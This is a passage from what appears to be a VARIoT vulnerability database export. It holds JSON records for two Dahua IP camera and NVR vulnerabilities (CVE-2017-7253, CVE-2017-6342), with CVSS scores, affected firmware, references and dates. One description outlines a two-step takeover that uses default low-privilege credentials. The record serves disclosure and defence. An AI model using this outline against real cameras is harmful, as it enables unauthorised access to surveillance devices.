            "version": "3.200.0001.6"
          },
          {
            "model": "dahua technology dahua ip camera",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "",
            "version": "3.200.0001.6"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "BID",
            "id": "97263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:3.200.0001.6:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Anonymous",
        "sources": [
          {
            "db": "BID",
            "id": "97263"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-7253",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2017-7253",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2017-04888",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-115456",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-7253",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-7253",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-04888",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201703-1081",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-115456",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a \"Component error: login challenge!\" message. The second JSON object encountered has a result indicating a successful admin login. Dahua IP Camera Devices have vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. DahuaIPCamera is a webcam from Dahua, China. A privilege escalation and information disclosure vulnerability exists in DahuaIPCamera 3.200.0001.6. \nAn attacker can exploit these issues to gain elevated privileges and obtain unauthorized access to the sensitive information",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "BID",
            "id": "97263"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-7253",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "97263",
            "trust": 2.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "db": "BID",
            "id": "97263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "id": "VAR-201703-1235",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          }
        ],
        "trust": 1.4857143
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:51:21.933000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Dahua IPC Information Disclosure \u0026 Privilege Escalation",
            "trust": 0.8,
            "url": "https://gist.github.com/anonymous/16aca69b7dea27cb73ddebb0d9033b02"
          },
          {
            "title": "Dahua IP Camera Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99695"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-922",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-264",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://gist.github.com/anonymous/16aca69b7dea27cb73ddebb0d9033b02"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/97263"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7253"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7253"
          },
          {
            "trust": 0.3,
            "url": "www.dahuasecurity.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "db": "BID",
            "id": "97263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "db": "BID",
            "id": "97263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-04-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "date": "2017-03-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "date": "2017-03-30T00:00:00",
            "db": "BID",
            "id": "97263"
          },
          {
            "date": "2017-04-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "date": "2017-03-30T18:59:00.170000",
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "date": "2017-03-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-04-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-04888"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-115456"
          },
          {
            "date": "2017-04-04T00:02:00",
            "db": "BID",
            "id": "97263"
          },
          {
            "date": "2017-04-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-7253"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua IP Camera Vulnerabilities related to authorization, authority, and access control in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002787"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-1081"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201702-1056

    Vulnerability from variot - Updated: 2023-12-18 12:44

    An issue was discovered on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19. When SmartPSS Software is launched, while on the login screen, the software in the background automatically logs in as admin. This allows sniffing sensitive information identified in CVE-2017-6341 without prior knowledge of the password. This is a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A remote attacker can use the vulnerability to implement a rainbow table attack to obtain sensitive information. Dahua Security Multiple Products are prone to an information-disclosure vulnerability

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201702-1056",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "smartpss",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "1.16.1"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.28.r"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0001.10"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2.400.0000.28.r 2016-03-29"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "3.210.0001.10 2016-06-06"
          },
          {
            "model": "smart pss",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "1.16.1 2017-01-19"
          },
          {
            "model": "security dhi-hcvr7216a-s3",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "3.210.0001.102016-06-06"
          },
          {
            "model": "security camera 2.400.0000.28.r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2016-03-29"
          },
          {
            "model": "security smartpss software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "1.16.12017-01-19"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Andrew Frahn.",
        "sources": [
          {
            "db": "BID",
            "id": "96454"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-6342",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2017-6342",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-02590",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-114545",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-6342",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-6342",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-02590",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-919",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114545",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An issue was discovered on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19. When SmartPSS Software is launched, while on the login screen, the software in the background automatically logs in as admin. This allows sniffing sensitive information identified in CVE-2017-6341 without prior knowledge of the password. This is a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A remote attacker can use the vulnerability to implement a rainbow table attack to obtain sensitive information. Dahua Security Multiple Products are prone to an information-disclosure vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "BID",
            "id": "96454"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6342",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "96454",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "db": "BID",
            "id": "96454"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "id": "VAR-201702-1056",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          }
        ],
        "trust": 1.60625
      },
      "iot_taxonomy": {
        "@context": {
